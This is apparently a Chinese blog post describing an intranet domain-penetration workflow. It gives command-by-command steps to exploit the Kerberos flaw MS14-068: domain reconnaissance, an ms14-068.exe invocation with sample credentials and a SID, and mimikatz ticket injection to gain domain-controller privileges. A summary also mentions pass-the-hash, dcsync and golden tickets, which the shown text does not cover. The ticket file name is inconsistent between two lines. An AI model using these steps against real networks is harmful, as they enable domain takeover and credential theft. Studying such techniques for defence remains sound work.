内网渗透-域渗透的记录

本文详细介绍了如何利用MS14-068漏洞进行内网渗透,从获取普通域用户权限开始,通过Klist、mimikatz等工具进行票证操作,实现域控提权。接着,利用Psexec进行HASH传递攻击,并通过dcsync命令获取域内用户HASH信息。最后,讲述了如何生成和利用黄金票证维持管理员权限,整个过程深入浅出,涉及多种安全攻防技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

MS14-068漏洞提权(限制条件:打了补丁或者域中有Win2012/2012R2的域控):
首先,需要拥有一台域内普通用户(假设为用户A)账户权限,知道此账户的账号密码。然后依次执行如下命令

1.
Ipconfig /all //查询本机IP段,所在域等;记录所在的域的名字

Net group “domain controllers” /domain 查看域控制器

所以所在的域全名 WIN-DTHKV3MCSKH.dc.com
2.
Klist purge //清除本机所有票证

Whoami /all //查询SID值 ,记录SID值

利用工具包中(工具包在文章末尾提供下载-内有详细的图文说明)的MS14-068.exe 执行如下命令
“ms14-068.exe -u lisi@dc.com -p “1qaz@WSX” -s S-1-5-21-1382597820-942189592-943616189-1104 -d WIN-DTHKV3MCSKH.dc.com
-u 域用户名
-p 域用户密码
-s 记录的SID
-d 域控名字”
之后会在此软件同目录下生成一个名为TGT_kim@contoso.com.ccache 的票证;

利用mimikatz将票证注入内存中:
mimikatz.exe “kerberos::ptc TGT_lisi@dc.com.ccache” exit

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值